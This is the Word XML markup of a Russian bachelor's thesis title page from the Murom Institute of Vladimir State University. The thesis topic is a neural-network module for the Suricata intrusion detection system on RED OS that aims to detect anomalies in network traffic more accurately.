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4FC0" w14:textId="62B1BD9D" w:rsidR="00C73859" w:rsidRPr="00814744" w:rsidRDefault="002B5F81" w:rsidP="001F68DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Министерство науки и высшего образования Российской Федерации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C41B55" w14:textId="2FAC80DA" w:rsidR="002B5F81" w:rsidRPr="0078355F" w:rsidRDefault="002B5F81" w:rsidP="001F68DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0078355F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Муромский институт (филиал)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7E9C4" w14:textId="0A22668E" w:rsidR="002B5F81" w:rsidRPr="001F68DE" w:rsidRDefault="002B5F81" w:rsidP="001F68DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F68DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>федерального государственного бюджетного образовательного учреждения высшего образования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C5193F" w14:textId="0A043010" w:rsidR="002B5F81" w:rsidRPr="0078355F" w:rsidRDefault="002B5F81" w:rsidP="001F68DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0078355F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">«Владимирский государственный университет </w:t>
      </w:r>
      <w:r w:rsidR="001F68DE" w:rsidRPr="0078355F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0078355F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">имени Александра Григорьевича и </w:t>
      </w:r>
      <w:r w:rsidR="001F68DE" w:rsidRPr="0078355F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Николая Григорьевича Столетовых</w:t>
      </w:r>
      <w:r w:rsidRPr="0078355F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B55813" w14:textId="045614AB" w:rsidR="004654AE" w:rsidRDefault="001F68DE" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(МИ</w:t>
      </w:r>
      <w:r w:rsidR="00316AE9" w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ВлГУ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00814744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981F156" w14:textId="77777777" w:rsidR="000B2212" w:rsidRPr="000B2212" w:rsidRDefault="000B2212" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4346F320" w14:textId="0FF0E992" w:rsidR="00161F54" w:rsidRDefault="00C43C9B" w:rsidP="00C43C9B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3119"/>
          <w:tab w:val="center" w:pos="5103"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1701"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Факультет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005A1278" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ф</w:t>
      </w:r>
      <w:r w:rsidR="00F07D62" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ИТР</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9908B" w14:textId="44590024" w:rsidR="00161F54" w:rsidRDefault="00C43C9B" w:rsidP="00C43C9B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3119"/>
          <w:tab w:val="center" w:pos="5103"/>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1701"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Кафедра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00030E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ФПМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00C43C9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E54EB8" w14:textId="2009B340" w:rsidR="00161F54" w:rsidRDefault="00161F54" w:rsidP="002B5F81">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365EBA0F" w14:textId="1DC6E873" w:rsidR="00316AE9" w:rsidRDefault="00316AE9" w:rsidP="00C06C23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="left" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>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УТВЕРЖДАЮ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD6AB7A" w14:textId="5D54E8A2" w:rsidR="00C06C23" w:rsidRDefault="00C06C23" w:rsidP="00C06C23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="left" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>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316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Заведующий кафедрой</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D128B" w14:textId="0569573D" w:rsidR="00C06C23" w:rsidRPr="006C449C" w:rsidRDefault="00C06C23" w:rsidP="00316AE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006C449C" w:rsidRPr="00F07D62">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00030E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="00316AE9" w:rsidRPr="006C449C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00030E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="00316AE9" w:rsidRPr="006C449C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00316AE9" w:rsidRPr="006C449C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00030E4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Орло</w:t>
      </w:r>
      <w:r w:rsidR="00316AE9" w:rsidRPr="006C449C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D4807" w14:textId="5640A308" w:rsidR="00C06C23" w:rsidRPr="00CC1967" w:rsidRDefault="00C06C23" w:rsidP="00316AE9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="6521"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00316AE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(подпись)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="560141EE" w14:textId="0F10511A" w:rsidR="00C06C23" w:rsidRPr="00DB7E81" w:rsidRDefault="00316AE9" w:rsidP="00C06C23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2268"/>
          <w:tab w:val="left" w:pos="3969"/>
          <w:tab w:val="left" w:pos="5529"/>
          <w:tab w:val="center" w:pos="7230"/>
          <w:tab w:val="right" w:pos="9356"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C06C23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C06C23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE094E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>______</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidR="00C06C23" w:rsidRPr="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C06C23" w:rsidRPr="00DB7E81">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00316AE9">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DATE  \@ "yyyy"  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B6429D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B3740" w14:textId="75935A8E" w:rsidR="00161F54" w:rsidRDefault="00161F54" w:rsidP="0078355F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3105DE4A" w14:textId="3F7936A8" w:rsidR="00161F54" w:rsidRPr="00161F54" w:rsidRDefault="00C06C23" w:rsidP="00161F54">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t>БАКАЛАВРСКАЯ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2299A397" w14:textId="2CCCBDB3" w:rsidR="00161F54" w:rsidRPr="00161F54" w:rsidRDefault="00161F54" w:rsidP="00161F54">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00161F54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t>РАБОТА</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB80CD" w14:textId="1C5DFF09" w:rsidR="004654AE" w:rsidRDefault="004654AE" w:rsidP="0078355F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346A3BC6" w14:textId="77777777" w:rsidR="00DD5A13" w:rsidRPr="005A1278" w:rsidRDefault="00DD5A13" w:rsidP="00DD5A13">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="center" w:pos="5103"/>
          <w:tab w:val="left" w:pos="9357"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="284" w:right="339"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F270B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00891157">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">«Разработка нейросетевого модуля системы обнаружения вторжений </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00891157">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00891157">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> на базе РЕД ОС для повышения точности детекции аномалий в сетевом трафике»</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
